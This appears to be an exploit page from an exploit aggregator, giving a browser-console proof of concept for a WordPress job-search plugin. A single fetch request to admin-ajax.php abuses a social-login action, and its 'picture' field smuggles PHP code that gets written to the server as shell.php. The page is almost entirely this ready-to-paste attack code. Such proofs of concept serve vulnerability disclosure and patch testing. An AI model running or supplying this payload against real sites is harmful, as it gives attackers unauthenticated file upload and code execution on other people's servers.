Share
## https://sploitus.com/exploit?id=WPEX-ID:757412F4-E4F8-4007-8E3B-639A72B33180
Navigate to the site, and paste the following in your browser's console:

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: new URLSearchParams({
        'action': 'jobsearch_facebook_get_soc_login_url',
        'user_data': JSON.stringify({
            "given_name": (Math.random()*0x1000).toFixed(),
            "family_name": (Math.random()*0x1000).toFixed(),
            "picture": "data:,<?php phpinfo(); //shell.php",
            "name": (Math.random()*0x1000).toFixed(),
            "email": (Math.random()*0x1000).toFixed(),
            "id": (Math.random()*0x1000).toFixed(),
        })
    })
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));

Notice a new file named "shell.php" was uploaded to the site.